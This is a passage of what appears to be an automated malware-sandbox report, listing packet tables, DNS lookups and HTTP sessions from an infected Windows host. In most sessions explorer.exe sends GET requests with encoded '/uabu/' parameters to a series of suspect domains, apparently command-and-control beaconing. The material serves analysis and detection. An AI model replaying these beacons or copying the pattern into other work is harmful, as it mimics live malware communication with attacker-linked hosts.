                                                                                Apr 8, 2021 13:34:28.231518984 CEST8049729160.153.136.3192.168.2.5
                                                                                Apr 8, 2021 13:34:28.231622934 CEST4972980192.168.2.5160.153.136.3
                                                                                Apr 8, 2021 13:34:28.232156038 CEST4972980192.168.2.5160.153.136.3
                                                                                Apr 8, 2021 13:34:28.263297081 CEST8049729160.153.136.3192.168.2.5
                                                                                Apr 8, 2021 13:34:28.263442993 CEST4972980192.168.2.5160.153.136.3
                                                                                Apr 8, 2021 13:34:28.263508081 CEST4972980192.168.2.5160.153.136.3
                                                                                Apr 8, 2021 13:34:28.295006037 CEST8049729160.153.136.3192.168.2.5
                                                                                Apr 8, 2021 13:34:33.950870037 CEST4973080192.168.2.5209.99.40.222
                                                                                Apr 8, 2021 13:34:34.094578981 CEST8049730209.99.40.222192.168.2.5
                                                                                Apr 8, 2021 13:34:34.094669104 CEST4973080192.168.2.5209.99.40.222
                                                                                Apr 8, 2021 13:34:34.094811916 CEST4973080192.168.2.5209.99.40.222
                                                                                Apr 8, 2021 13:34:34.238534927 CEST8049730209.99.40.222192.168.2.5
                                                                                Apr 8, 2021 13:34:34.314126968 CEST8049730209.99.40.222192.168.2.5
                                                                                Apr 8, 2021 13:34:34.314306974 CEST4973080192.168.2.5209.99.40.222
                                                                                Apr 8, 2021 13:34:34.314363003 CEST4973080192.168.2.5209.99.40.222
                                                                                Apr 8, 2021 13:34:34.460891962 CEST8049730209.99.40.222192.168.2.5

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 8, 2021 13:32:22.833081961 CEST5221253192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:22.846518040 CEST53522128.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:22.996326923 CEST5430253192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:23.008068085 CEST53543028.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:23.306230068 CEST5378453192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:23.318253040 CEST53537848.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:23.933686018 CEST6530753192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:23.946712017 CEST53653078.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:25.813678980 CEST6434453192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:25.826666117 CEST53643448.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:25.913069963 CEST6206053192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:25.931328058 CEST53620608.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:27.814912081 CEST6180553192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:27.827399969 CEST53618058.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:31.728974104 CEST5479553192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:31.741303921 CEST53547958.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:32.897629023 CEST4955753192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:32.911175013 CEST53495578.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:34.201644897 CEST6173353192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:34.215279102 CEST53617338.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:40.029289961 CEST6544753192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:40.042716026 CEST53654478.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:40.800424099 CEST5244153192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:40.812822104 CEST53524418.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:43.518765926 CEST6217653192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:43.531644106 CEST53621768.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:44.282016039 CEST5959653192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:44.294867992 CEST53595968.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:32:52.887798071 CEST6529653192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:32:52.906302929 CEST53652968.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:00.137336969 CEST6318353192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:00.149841070 CEST53631838.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:17.721121073 CEST6015153192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:17.739259005 CEST53601518.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:17.945380926 CEST5696953192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:17.963702917 CEST53569698.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:30.210724115 CEST5516153192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:30.246296883 CEST53551618.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:35.405210018 CEST5475753192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:35.440232038 CEST53547578.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:38.592920065 CEST4999253192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:38.604931116 CEST53499928.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:40.915441036 CEST6007553192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:40.935023069 CEST53600758.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:45.830955029 CEST5501653192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:45.849416018 CEST53550168.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:46.397650003 CEST6434553192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:46.444155931 CEST53643458.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:33:51.550884008 CEST5712853192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:33:51.593406916 CEST53571288.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:01.743119001 CEST5479153192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:01.857958078 CEST53547918.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:04.070271015 CEST5046353192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:04.096291065 CEST53504638.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:07.454755068 CEST5039453192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:07.841377020 CEST53503948.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:12.860888958 CEST5853053192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:12.890397072 CEST53585308.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:13.140750885 CEST5381353192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:13.164822102 CEST53538138.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:15.298439980 CEST6373253192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:15.324740887 CEST53637328.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:17.937128067 CEST5734453192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:17.996918917 CEST53573448.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:23.019419909 CEST5445053192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:23.092856884 CEST53544508.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:28.178893089 CEST5926153192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:28.198776007 CEST53592618.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:33.301706076 CEST5715153192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:33.949660063 CEST53571518.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:39.329008102 CEST5941353192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:39.365118027 CEST53594138.8.8.8192.168.2.5
                                                                                Apr 8, 2021 13:34:44.375610113 CEST6051653192.168.2.58.8.8.8
                                                                                Apr 8, 2021 13:34:44.528567076 CEST53605168.8.8.8192.168.2.5

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Apr 8, 2021 13:33:30.210724115 CEST192.168.2.58.8.8.80xb067Standard query (0)www.mayipay9.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:35.405210018 CEST192.168.2.58.8.8.80x9fb0Standard query (0)www.salesenablementlaunch.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.915441036 CEST192.168.2.58.8.8.80xeb20Standard query (0)www.oldschoolnews.netA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:46.397650003 CEST192.168.2.58.8.8.80x7616Standard query (0)www.aquaroyaume.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:51.550884008 CEST192.168.2.58.8.8.80xdf83Standard query (0)www.globalperfumery.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:01.743119001 CEST192.168.2.58.8.8.80x3ff5Standard query (0)www.kopebitest.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:07.454755068 CEST192.168.2.58.8.8.80x3d43Standard query (0)www.qingniang.clubA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:12.860888958 CEST192.168.2.58.8.8.80x187dStandard query (0)www.lattakia-imbiss.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:17.937128067 CEST192.168.2.58.8.8.80x17d2Standard query (0)www.ahaal20.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:23.019419909 CEST192.168.2.58.8.8.80xf3bcStandard query (0)www.farmacyfastfood.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:28.178893089 CEST192.168.2.58.8.8.80xe300Standard query (0)www.bigbuddyco.comA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:33.301706076 CEST192.168.2.58.8.8.80xa891Standard query (0)www.agarkovsport.onlineA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:39.329008102 CEST192.168.2.58.8.8.80xfaacStandard query (0)www.xiaoqiche.netA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:44.375610113 CEST192.168.2.58.8.8.80xe01dStandard query (0)www.almosting.comA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Apr 8, 2021 13:33:30.246296883 CEST8.8.8.8192.168.2.50xb067No error (0)www.mayipay9.commayipay9.comCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 13:33:30.246296883 CEST8.8.8.8192.168.2.50xb067No error (0)mayipay9.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:35.440232038 CEST8.8.8.8192.168.2.50x9fb0No error (0)www.salesenablementlaunch.comsalesenablementlaunch.comCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 13:33:35.440232038 CEST8.8.8.8192.168.2.50x9fb0No error (0)salesenablementlaunch.com34.102.136.180A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)www.oldschoolnews.netparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:40.935023069 CEST8.8.8.8192.168.2.50xeb20No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:46.444155931 CEST8.8.8.8192.168.2.50x7616No error (0)www.aquaroyaume.com185.107.56.197A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:33:51.593406916 CEST8.8.8.8192.168.2.50xdf83No error (0)www.globalperfumery.com94.136.40.51A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:01.857958078 CEST8.8.8.8192.168.2.50x3ff5No error (0)www.kopebitest.comkopebitest.comCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 13:34:01.857958078 CEST8.8.8.8192.168.2.50x3ff5No error (0)kopebitest.com103.253.212.249A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:07.841377020 CEST8.8.8.8192.168.2.50x3d43Name error (3)www.qingniang.clubnonenoneA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:12.890397072 CEST8.8.8.8192.168.2.50x187dName error (3)www.lattakia-imbiss.comnonenoneA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:17.996918917 CEST8.8.8.8192.168.2.50x17d2Server failure (2)www.ahaal20.comnonenoneA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:23.092856884 CEST8.8.8.8192.168.2.50xf3bcNo error (0)www.farmacyfastfood.com212.237.249.116A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:28.198776007 CEST8.8.8.8192.168.2.50xe300No error (0)www.bigbuddyco.combigbuddyco.comCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 13:34:28.198776007 CEST8.8.8.8192.168.2.50xe300No error (0)bigbuddyco.com160.153.136.3A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:33.949660063 CEST8.8.8.8192.168.2.50xa891No error (0)www.agarkovsport.online209.99.40.222A (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:39.365118027 CEST8.8.8.8192.168.2.50xfaacName error (3)www.xiaoqiche.netnonenoneA (IP address)IN (0x0001)
                                                                                Apr 8, 2021 13:34:44.528567076 CEST8.8.8.8192.168.2.50xe01dNo error (0)www.almosting.comalrighting.xshoppy.shopCNAME (Canonical name)IN (0x0001)
                                                                                Apr 8, 2021 13:34:44.528567076 CEST8.8.8.8192.168.2.50xe01dNo error (0)alrighting.xshoppy.shop75.2.113.213A (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • www.mayipay9.com
                                                                                • www.salesenablementlaunch.com
                                                                                • www.oldschoolnews.net
                                                                                • www.aquaroyaume.com
                                                                                • www.globalperfumery.com
                                                                                • www.kopebitest.com
                                                                                • www.farmacyfastfood.com
                                                                                • www.bigbuddyco.com
                                                                                • www.agarkovsport.online

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.54971234.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:33:30.270664930 CEST1292OUTGET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=RBOjcSI+0PCin3DYAfURe2BWN4BeTm/4XrPmNHFHgtwunN92sbbb7RERPNQIss2FkGEY HTTP/1.1
                                                                                Host: www.mayipay9.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:33:30.395435095 CEST1293INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Thu, 08 Apr 2021 11:33:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "606abe1d-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.54971334.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:33:35.454659939 CEST1294OUTGET /uabu/?_hrPK=bFc1eA65WhbOipBbmVMfd20rI4CLIGZenFDlnHAQDQVOe5/sLng8MX+h5fYtrCFe3/9q&o0D=jL0LdZHh34d0ut HTTP/1.1
                                                                                Host: www.salesenablementlaunch.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:33:35.569008112 CEST1294INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Thu, 08 Apr 2021 11:33:35 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "605e06f8-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                2192.168.2.549716198.54.117.21880C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:33:41.110529900 CEST1341OUTGET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=ruxw5m/fBZTANxn0+vJzkbJheatIWyH69nVPD3/Jlr0HuUfdGUrtHvekpNeCw/DRWxiy HTTP/1.1
                                                                                Host: www.oldschoolnews.net
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                3192.168.2.549722185.107.56.19780C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:33:46.475327969 CEST2984OUTGET /uabu/?_hrPK=6Zl6RiEYODzPbdy+2wZTGBaD4iiheZyVMMytIIVZHQDK7z0ruM0YoJ4KglarveH57crY&o0D=jL0LdZHh34d0ut HTTP/1.1
                                                                                Host: www.aquaroyaume.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:33:46.528913975 CEST3051INHTTP/1.1 302 Found
                                                                                cache-control: max-age=0, private, must-revalidate
                                                                                connection: close
                                                                                content-length: 11
                                                                                date: Thu, 08 Apr 2021 11:33:46 GMT
                                                                                location: http://survey-smiles.com
                                                                                server: nginx
                                                                                set-cookie: sid=47dc9904-985e-11eb-bcb9-1293ae6b7a88; path=/; domain=.aquaroyaume.com; expires=Tue, 26 Apr 2089 14:47:53 GMT; max-age=2147483647; HttpOnly
                                                                                Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                Data Ascii: Redirecting


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                4192.168.2.54972394.136.40.5180C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:33:51.645071030 CEST5686OUTGET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=1HJ8hpHXj7k6l9UeC2bjkMh/CRdcIJGwkP5JhSUqrI08aFfpwfXceIsoU6U6XBnGkY13 HTTP/1.1
                                                                                Host: www.globalperfumery.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:33:51.695214033 CEST5687INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 08 Apr 2021 11:31:55 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 793
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta name="viewport" content="width=device-width"><link rel="stylesheet" href="/style/stylesheet.css" type="text/css" media="all"> <link rel="icon" type="image/png" href="favicon-32x32.png" sizes="32x32"></head><body> <iframe src="https://www.123-reg-new-domain.co.uk/iframe.html" width="100%" scrolling="no"></iframe></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                5192.168.2.549724103.253.212.24980C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:34:02.044403076 CEST5688OUTGET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=KguTjtt16OyzM8616W2q3NqOALXbhZ5U+Dplj7JdQYnMpaKDZTu3BtKCZayxVhVKqktu HTTP/1.1
                                                                                Host: www.kopebitest.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:34:02.446372032 CEST5688INHTTP/1.1 301 Moved Permanently
                                                                                Date: Thu, 08 Apr 2021 11:34:02 GMT
                                                                                Server: Apache
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                X-Redirect-By: WordPress
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade, close
                                                                                Location: http://kopebitest.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=KguTjtt16OyzM8616W2q3NqOALXbhZ5U+Dplj7JdQYnMpaKDZTu3BtKCZayxVhVKqktu
                                                                                Vary: Accept-Encoding
                                                                                Content-Length: 0
                                                                                Content-Type: text/html; charset=UTF-8


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                6192.168.2.549728212.237.249.11680C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:34:23.128309011 CEST5741OUTGET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=eLrKZiH/4/rcvGguyk8xXNlCiwRhUX1CU5PxP0qOxyscr2i7rTHvuvRLv311KV985405 HTTP/1.1
                                                                                Host: www.farmacyfastfood.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:34:23.162314892 CEST5742INHTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                Pragma: no-cache
                                                                                Content-Type: text/html
                                                                                Content-Length: 707
                                                                                Date: Thu, 08 Apr 2021 11:34:23 GMT
                                                                                Server: LiteSpeed
